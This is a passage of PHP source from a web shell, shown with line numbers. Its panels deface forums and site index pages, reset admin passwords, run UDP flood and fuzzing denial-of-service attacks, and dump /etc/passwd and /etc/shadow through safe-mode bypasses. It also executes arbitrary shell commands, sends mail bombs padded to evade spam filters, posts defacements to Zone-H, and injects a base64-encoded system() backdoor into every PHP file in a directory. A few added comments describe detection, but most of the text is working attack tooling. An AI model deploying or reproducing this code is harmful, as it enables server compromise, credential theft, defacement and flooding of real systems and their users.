4120 <tr><td height="50" width="50%">Type :
4121 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
4122 <option value="vb">vbulletin</option>
4123 <option value="mybb">Mybb</option>
4124 <option value="smf">SMF</option>
4125 <option value="ipb">IPB</option>
4126 <option value="wp">Wordpress</option>
4127 <option value="joomla">Joomla</option>
4128 </select></td>
4129 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
4130
4131 </tr>
4132 <tr>
4133 <td height="167" width="50%" colspan=2>
4134 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" id="siteurl" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
4135
4136 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
4137
4138 </div>
4139
4140 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
4141 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,f5.value)" class="but" value = "Hack It">
4142 </td>
4143 </tr>
4144 </table>
4145 </form>
4146 </center>
4147 <?php
4148 }
4149 else if(isset($_GET["passwordchange"]))
4150 {
4151 echo "<center>";
4152 ?>
4153 <div id="showchangepass"></div>
4154 <font size="4">Forum Password Changer</font>
4155 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value);return false;">
4156 <table class=btmtbl border = "1" width="60%" height="246" style="text-align: center;" align="center">
4157 <tr>
4158 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> DataBase : <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> User : <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4159 <tr>
4160 <td height="50" width="50%">Type :
4161 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
4162 <option value="vb">vbulletin</option>
4163 <option value="mybb">Mybb</option>
4164 <option value="smf">SMF</option>
4165 <option value="ipb">IPB</option>
4166 <option value="phpbb">PHPBB</option>
4167 <option value="wp">Wordpress</option>
4168 <option value="joomla">Joomla</option>
4169 </select></td>
4170 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
4171 </tr>
4172 <tr>
4173 <td colspan=2 height="100" width="780">
4174
4175 <p align="center"><div id="fid" style="display:block;">User ID : <input class="sbox" type="text" name="ipbuid" size="20" value="1"> New Password : <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
4176
4177 <div id="joomla" style="display:none;">New Username : <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
4178
4179 <div id="wpress" style="display:none;"><p>New Username : <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p></div>
4180
4181 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
4182 </tr>
4183 </table>
4184 </form>
4185 </center>
4186 <?php
4187}
4188else if(isset($_GET['dosser']))
4189{
4190 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
4191 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
4192 {
4193 $IP=$_GET['ip'];
4194 $port=$_GET['port'];
4195 $executionTime = $_GET['exTime'];
4196 $no0fBytes = $_GET['no0fBytes'];
4197 $data = "";
4198 $timeout = $_GET['timeout'];
4199 $packets = 0;
4200 $counter = $no0fBytes;
4201 $maxTime = time() + $executionTime;;
4202 while($counter--)
4203 {
4204 $data .= "X";
4205 }
4206 $data .= " Dhanush";
4207
4208 while(1)
4209 {
4210 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
4211 if($socket)
4212 {
4213 fwrite($socket , $data);
4214 fclose($socket);
4215 $packets++;
4216 }
4217 if(time() >= $maxTime)
4218 {
4219 break;
4220 }
4221 }
4222 echo "Dos Completed!<br>";
4223 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
4224 echo "Total Number of Packets Sent : " . $packets . "<br />";
4225 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
4226 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
4227 }
4228}
4229else if(isset($_GET['fuzzer']))
4230{
4231 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
4232 {
4233 $IP=$_GET['ip'];
4234 $port=$_GET['port'];
4235 $times = $_GET['exTime'];
4236 $timeout = $_GET['timeout'];
4237 $send = 0;
4238 $ending = "";
4239 $multiplier = $_GET['multiplier'];
4240 $data = "";
4241 $mode="tcp";
4242 $data .= "GET /";
4243 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
4244 if($_GET['type'] == "tcp")
4245 {
4246 $mode = "tcp";
4247 }
4248
4249 while($multiplier--)
4250
4251 {
4252 $data .= urlencode($_GET['no0fBytes']);
4253 }
4254 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
4255 $data .= "by-Dhanush".$ending;
4256 $length = strlen($data);
4257
4258
4259 echo "Sending Data :- <br /> <p align='center'>$data</p>";
4260
4261 for($i=0;$i<$times;$i++)
4262 {
4263 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
4264 if($socket)
4265 {
4266 fwrite($socket , $data , $length );
4267 fclose($socket);
4268 }
4269 }
4270 echo "Fuzzing Completed!<br>";
4271 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
4272 echo "Total Number of Packets Sent : " . $times . "<br />";
4273 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
4274 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
4275 }
4276}
4277else if(isset($_GET['bypassit']))
4278{
4279 echo "<BR>";
4280 if(isset($_GET['copy']))
4281 {
4282 if(@copy($_GET['copy'],"test1.php"))
4283 {
4284 $fh=fopen("test1.php",'r');
4285 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea>";
4286 @fclose($fh);
4287 unlink("test1.php");
4288 }
4289 }
4290 else if(isset($_GET['filecontents']))
4291 {
4292 echo "<textarea cols=100 rows=20 class=box readonly>";
4293 echo file_get_contents($_GET['filecontents']);
4294 echo "</textarea>";
4295 }
4296 else if(isset($_GET['stream']))
4297 {
4298 echo "<textarea cols=100 rows=20 class=box readonly>";
4299 $file=$_GET['stream'];
4300 if ($stream = fopen($file, 'r')) {
4301 echo stream_get_contents($stream, -1, 0);
4302 fclose($stream);
4303 }
4304
4305 echo "</textarea>";
4306 }
4307 else if(isset($_GET['curl']))
4308 {
4309 $ch=curl_init("file://" . $_GET[curl]);
4310 curl_setopt($ch,CURLOPT_HEADERS,0);
4311 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
4312 $file_out=curl_exec($ch);
4313 curl_close($ch);
4314 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea>";
4315 }
4316 else if(isset($_GET['include']))
4317 {
4318 if(file_exists($_GET['include']))
4319 {
4320 echo "<textarea cols=100 rows=20 class=box readonly>";
4321 @include($_GET['include']);
4322 echo "</textarea>";
4323 }
4324 else
4325 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
4326 }
4327 else if(isset($_GET['id']))
4328 {
4329 echo "<textarea cols=100 rows=20 class=box readonly>";
4330 for($uid=0;$uid<60000;$uid++)
4331 {
4332 $ara = posix_getpwuid($uid);
4333 if (!empty($ara))
4334 {
4335 while (list ($key, $val) = each($ara))
4336 {
4337 print "$val:";
4338 }
4339 print "\n";
4340 }
4341 }
4342 echo "</textarea>";
4343 }
4344 else if(isset($_GET['tempnam']))
4345 {
4346 echo "<textarea cols=100 rows=20 class=box readonly>";
4347 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
4348 $fp = fopen ( $mytmp, 'r' );
4349 while(!feof($fp))
4350 echo fgets($fp);
4351 fclose ( $fp );
4352 echo "</textarea>";
4353 }
4354 else if(isset($_GET['symlnk']))
4355 {
4356 echo "<textarea cols=100 rows=20 class=box readonly>";
4357 @mkdir("mydhanush",0777);
4358 @chdir("mydhanush");
4359 execmd("ln -s /etc/passwd");
4360
4361 echo file_get_contents($curr_url . "/mydhanush/passwd");
4362 echo "</textarea>";
4363 }
4364 if(isset($_GET['newtype']))
4365 {
4366 $filename = $_GET['newtype'];
4367 echo "<textarea cols=100 rows=20 class=box readonly>";
4368 if($_GET['optiontype'] == "xxd")
4369 echo execmd("xxd ".$filename);
4370 else if($_GET['optiontype'] == "rev")
4371 echo execmd("rev ".$filename);
4372 if($_GET['optiontype'] == "tac")
4373 echo execmd("tac ".$filename);
4374 if($_GET['optiontype'] == "more")
4375 echo execmd("more ".$filename);
4376 if($_GET['optiontype'] == "less")
4377 echo execmd("less ".$filename);
4378 if($_GET['optiontype'] == "awk")
4379 echo execmd("awk '{ print }' ".$filename);
4380 echo "</textarea>";
4381 }
4382 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 2px;" /><BR><BR><BR>';
4383}
4384// Deface Website
4385else if(isset($_GET['deface']))
4386{
4387 $myfile = fopen($_GET['deface'],'w');
4388 if(fwrite($myfile, base64_decode($ind)))
4389 {fclose($myfile);
4390 echo "Index Defaced Successfully";}
4391 else
4392 echo "Donot have write permission";
4393}
4394else if(isset($_GET['perms']))
4395{
4396?><br>
4397 <form>
4398 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
4399 <table align="center" border="1" style="width:40%;border-color:#333333;border-collapse:collapse;">
4400 <tr>
4401 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4402 </tr>
4403 <tr>
4404 <td colspan="2" align="center" style="height:60px">
4405 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" />
4406 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4407 </td>
4408 </tr>
4409 </table>
4410
4411 </form>
4412 <?php
4413}
4414else if(isset($_GET["chmode"]))
4415{
4416 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
4417 {
4418 echo '<br>';
4419 $perms = 0;
4420 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
4421 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
4422 if(@chmod($_GET['myfilename'],$perms))
4423 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
4424 else
4425 echo "<center><blink>Cannot Change File Permissions</blink></center>";
4426 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4427 }
4428}
4429else if(isset($_GET['rename']))
4430{
4431?><BR>
4432 <form>
4433 <table border="0" cellpadding="7" cellspacing="3">
4434 <tr>
4435 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
4436 </tr>
4437 <tr>
4438 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
4439 </tr>
4440 <tr>
4441 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
4442 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4443 </td>
4444 </tr>
4445 </table>
4446 </form>
4447 <?php
4448
4449}
4450else if(isset($_GET['renamemyfile']))
4451{
4452 if(isset($_GET['to']) && isset($_GET['file']))
4453 {
4454 echo '<br>';
4455 if(!rename($_GET['file'], $_GET['to']))
4456 echo "Cannot Rename File";
4457 else
4458 echo "<font class=txt>File Renamed Successfully</font>";
4459 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4460 }
4461}
4462else if(isset($_GET['open']))
4463{
4464 if(is_file($_GET['myfilepath']))
4465 {
4466 $owner = "0/0";
4467 if($os == "Linux")
4468 $owner = getOGid($_GET['myfilepath']);
4469 ?>
4470 <form>
4471 <table style="width:57%;">
4472 <tr align="left">
4473 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
4474 </tr>
4475 <tr>
4476 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4477 </tr>
4478 </table>
4479 <textarea name="content" rows="15" cols="100" class="box"><?php
4480 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
4481 if($content)
4482 {
4483 echo $content;
4484 }
4485 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
4486 {
4487 if(filesize($_GET['myfilepath']) != 0 )
4488 {
4489 fopen($_GET['myfilepath']);
4490 while(!feof())
4491 {
4492 echo htmlspecialchars(fgets($_GET['myfilepath']));
4493 }
4494 }
4495 }
4496
4497 ?>
4498 </textarea><br />
4499 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
4500 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
4501 </form>
4502 <?php
4503 }
4504 else
4505 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
4506}
4507else if(isset($_POST['file']) && isset($_POST['content']))
4508{
4509 echo '<BR>';
4510 if(file_exists($_POST['file']))
4511 {
4512 $handle = fopen($_POST['file'],"w");
4513 if(fwrite($handle,$_POST['content']))
4514 echo "<font class=txt>File Saved Successfully!</font>";
4515 else
4516 echo "Cannot Write into File";
4517 }
4518 else
4519 {
4520 echo "File Name Specified does not exists!";
4521 }
4522 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>';
4523}
4524else if(isset($_POST["SendNowToZoneH"]))
4525{
4526 $hacker = $_POST['defacer'];
4527 $method = $_POST['hackmode'];
4528 $neden = $_POST['reason'];
4529 $site = $_POST['domain'];
4530
4531 if (empty($hacker))
4532 {
4533 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
4534 }
4535 elseif($method == "--------SELECT--------")
4536 {
4537 die("<center><font size=3>[-] You Must Select The Method !</center>");
4538 }
4539 elseif($neden == "--------SELECT--------")
4540 {
4541 die("<center><font size=3>[-] You Must Select The Reason</center>");
4542 }
4543 elseif(empty($site))
4544 {
4545 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
4546 }
4547 // Zone-h Poster
// Defacement-notification poster — an indicator of compromise, not a legitimate feature.
// Sends a single HTTP POST to $url (the caller passes "http://zone-h.org/notify/single")
// with the body "defacer=..&domain1=..&hackmode=..&reason=.." assembled by string
// concatenation from the four remaining parameters. Redirects are followed and the
// response body is returned; curl_exec() returns false on transport failure, and the
// caller discards the return value either way.
// Detection/response: an outbound POST from the web-server process to
// zone-h.org/notify/single carrying these field names is a strong signal that a
// defacement toolkit is active on the host; egress logging or blocking of that
// destination surfaces it.
// The declaration lives inside a conditional branch, so the function only comes into
// existence once that branch has executed.
4548 function ZoneH($url, $hacker, $hackmode,$reson, $site )
4549 {
4550 $k = curl_init();
4551 curl_setopt($k, CURLOPT_URL, $url);
4552 curl_setopt($k,CURLOPT_POST,true);
// Form body built by concatenation of the caller-supplied values.
4553 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
4554 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
4555 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
// Response body on success; false if the request itself failed.
4556 $kubra = curl_exec($k);
4557 curl_close($k);
4558 return $kubra;
4559 }
4560
4561 $i = 0;
4562 $sites = explode("\n", $site);
4563 echo "<pre class=ml1 style='margin-top:5px'>";
4564 while($i < count($sites))
4565 {
4566 if(substr($sites[$i], 0, 4) != "http")
4567 {
4568 $sites[$i] = "http://".$sites[$i];
4569 }
4570 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
4571 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
4572 ++$i;
4573 }
4574
4575 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
4576}
4577else if(isset($_GET['executemycmd']))
4578{
4579 $comm = $_GET['executemycmd'];
4580 chdir($_GET['executepath']);
4581 echo shell_exec($comm);
4582}
4583// View Passwd file
4584else if(isset($_GET['passwd']))
4585{
4586 $test='';
4587 $tempp= tempnam($test, "cx");
4588 $get = "/etc/passwd";
4589 $name=@posix_getpwuid(@fileowner($get));
4590 $group=@posix_getgrgid(@filegroup($get));
4591 $owner = $name['name']. " / ". $group['name'];
4592 ?>
4593 <table style="width:57%;">
4594 <tr>
4595 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
4596 </tr>
4597 <tr>
4598 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4599 </tr>
4600 </table>
4601 <?php
4602 if(copy("compress.zlib://".$get, $tempp))
4603 {
4604 $fopenzo = fopen($tempp, "r");
4605 $freadz = fread($fopenzo, filesize($tempp));
4606 fclose($fopenzo);
4607 $source = htmlspecialchars($freadz);
4608 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
4609 unlink($tempp);
4610 }
4611 else
4612 {
4613 ?>
4614 <form>
4615 <input type="hidden" name="etcpasswd">
4616 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
4617 <tr>
4618 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
4619 </tr>
4620 <tr>
4621 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
4622 </tr>
4623 <tr>
4624 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
4625 </tr>
4626 </table><br>
4627 </form>
4628 <?php
4629 }
4630 ?>
4631 <br />
4632 <input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>
4633 <?php
4634}
4635else if(isset($_GET['shadow']))
4636{
4637 $test='';
4638 $tempp= tempnam($test, "cx");
4639 $get = "/etc/shadow";
4640 if(copy("compress.zlib://".$get, $tempp))
4641 {
4642 $fopenzo = fopen($tempp, "r");
4643 $freadz = fread($fopenzo, filesize($tempp));
4644 fclose($fopenzo);
4645 $source = htmlspecialchars($freadz);
4646 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
4647 unlink($tempp);
4648 }
4649}
4650else if(isset($_GET['bomb']))
4651{
4652 ?><div id="showmail"></div>
4653 <form>
4654 <table id="margins" style="width:100%;">
4655 <tr>
4656 <td style="width:30%;">To</td>
4657 <td>
4658 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
4659 </td>
4660 </tr>
4661 <tr>
4662
4663 <td style="width:30%;">Subject</td>
4664 <td>
4665 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
4666 </td>
4667 </tr>
4668 <tr>
4669 <td style="width:30%;">No. of Times</td>
4670 <td>
4671 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
4672 </td>
4673 </tr>
4674 <tr>
4675 <td style="width:30%;">Pad your message (Less spam detection)</td>
4676 <td><input type="checkbox" name="padding"/></td>
4677 </tr>
4678 <tr>
4679 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
4680 </tr>
4681 <tr>
4682 <td rowspan="2">
4683 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
4684 </td>
4685 </tr>
4686 </table>
4687 </form>
4688 <?php
4689}
4690
4691//Mass Mailer
4692else if(isset($_GET['mail']))
4693{
4694 ?><div id="showmail"></div>
4695 <div align="left">
4696 <form>
4697 <table align="left" style="width:100%;">
4698 <tr>
4699 <td style="width:10%;">From</td>
4700 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'Hello@abcd.in')this.value = '';" onBlur="if(this.value=='')this.value='Hello@abcd.in';"/></td>
4701 </tr>
4702
4703 <tr>
4704 <td style="width:20%;">To</td>
4705 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
4706 </tr>
4707
4708 <tr>
4709 <td style="width:20%;">Subject</td>
4710 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
4711 </tr>
4712
4713
4714 <tr>
4715 <td colspan="2">
4716 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!! Patch your site.....</textarea>
4717 </td>
4718 </tr>
4719
4720
4721 <tr>
4722 <td rowspan="2">
4723 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
4724 </td>
4725 </tr>
4726 </table>
4727 </form></div>
4728 <?php
4729}
4730// Get Domains
4731else if(isset($_REQUEST["symlinkserver"]))
4732{
4733 ?>
4734 <center><table><tr>
4735 <td><a href=javascript:void(0) onClick="getdata('perlsymlink')"><font class=txt><b>| Perl Symlink |</b></font></a></td>
4736 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
4737 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
4738 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
4739 </tr></table></center><br>
4740 <div id="showdata"></div><?php
4741}
4742// Forum Manager
4743else if(isset($_REQUEST["forum"]))
4744{ ?>
4745 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
4746 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
4747 <td><a href=# onClick="getdata('massdeface')"><font class=txt size="4">| Mass Defacer |</font></a></td>
4748 </tr></table></center><br><div id="showdata"></div>
4749 <?php
4750}
4751// Sec info
4752else if(isset($_GET['secinfo']))
4753{ ?><div id=showdata></div>
4754<center><div id="showmydata"></div>
4755</center>
4756<br><center><font size=5>Server security information</font><br><br></center>
4757 <table class="btmtbl" style="width:100%;" border="1">
4758 <tr>
4759 <td style="width:7%;">Curl</td>
4760 <td style="width:7%;">Oracle</td>
4761 <td style="width:7%;">MySQL</td>
4762 <td style="width:7%;">MSSQL</td>
4763 <td style="width:7%;">PostgreSQL</td>
4764 <td style="width:12%;">Open Base Directory</td>
4765 <td style="width:10%;">Safe_Exec_Dir</td>
4766 <td style="width:7%;">PHP Version</td>
4767 <td style="width:7%;">Magic Quotes</td>
4768 <td style="width:7%;">Server Admin</td>
4769 </tr>
4770 <tr>
4771 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
4772 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
4773 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
4774 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
4775 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
4776 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
4777 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font class='txt'>$df</font></b>";};} ?></font></td>
4778 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
4779 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
4780 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
4781 </tr>
4782</table><br> <?php
4783 mysecinfo();
4784}
4785// Code Injector
4786
4787else if(isset($_GET['injector']))
4788{
4789 if($os != "Windows")
4790 $injectcode = "PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+";
4791 else
4792 {
4793 $injectcode = "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";
4794 }
4795 ?>
4796 <form method='POST'>
4797 <table id="margins">
4798 <tr>
4799 <td width="100" class="title">
4800 Directory
4801 </td>
4802 <td>
4803 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
4804 </td>
4805
4806 </tr>
4807 <tr>
4808 <td class="title">
4809 Mode
4810 </td>
4811 <td>
4812 <select style="width: 400px;" name="mode" class="box">
4813 <option value="Apender">Apender</option>
4814 <option value="Overwriter">Overwriter</option>
4815 </select>
4816 </td>
4817 </tr>
4818 <tr>
4819 <td class="title">
4820 File Type
4821 </td>
4822 <td>
4823 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
4824 </td>
4825 </tr>
4826 <tr>
4827 <td>Create A backdoor by injecting this code in every php file of current directory</td>
4828 </tr>
4829
4830 <tr>
4831 <td colspan="2"><?php if($os == "Windows"){echo "<i>Default Password is : <b>Dhanush</b> (change to yours using MD5)</i> Example : .php?dhpasswd=Dhanush";}else{if(!function_exists('system')){echo "system() function disabled";}} ?><BR>
4832 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode($injectcode); ?></textarea>
4833 </td>
4834 </tr>
4835 <tr>
4836 <td rowspan="2">
4837 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
4838 </td>
4839 </tr>
4840 </form>
4841 </table><div id="showinject"</div>
4842 <?php
4843}
4844// Bypass
4845else if(isset($_GET["bypass"]))
4846{
4847 ?><center><div id="showmydata"></div></center>
4848 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;border-collapse:collapse;">
4849 <tr>
4850 <td align="center" colspan="2"><font size="3">Safe mode bypass</font></td>
4851 </tr>
4852 <tr>
4853 <td align="center">
4854 <p>Using copy() function</p>
4855 <form onSubmit="bypassfun('copy',copy.value);return false;">
4856 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
4857 </form>
4858 </td>
4859 <td align="center">
4860 <p>Using File contents function</p>
4861 <form onSubmit="bypassfun('filecontents',filecontents.value);return false;">
4862 <input type="text" name="filecontents" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('filecontents',filecontents.value)" value="bypass" class="but">
4863 </form>
4864 </td>
4865 </tr>
4866
4867 <tr>
4868 <td align="center">
4869 <p>Using Stream contents function</p>
4870 <form onSubmit="bypassfun('stream',stream.value);return false;">
4871 <input type="text" name="stream" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('stream',stream.value)" value="bypass" class="but">
4872 </form>
4873 </td>
4874 <td align="center">
4875 <p>Using Curl() function</p>
4876 <form onSubmit="bypassfun('curl',curl.value);return false;">
4877 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
4878 </form>
4879 </td>
4880 </tr>
4881
4882 <tr>
4883 <td align="center">
4884 <p>Bypass using include()</p>
4885 <form onSubmit="bypassfun('include',include.value);return false;">
4886 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
4887 </form>
4888 </td>
4889 <td align="center">
4890 <p>Using id() function</p>
4891 <form onSubmit="bypassfun('id',id.value);return false;">
4892 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
4893 </form>
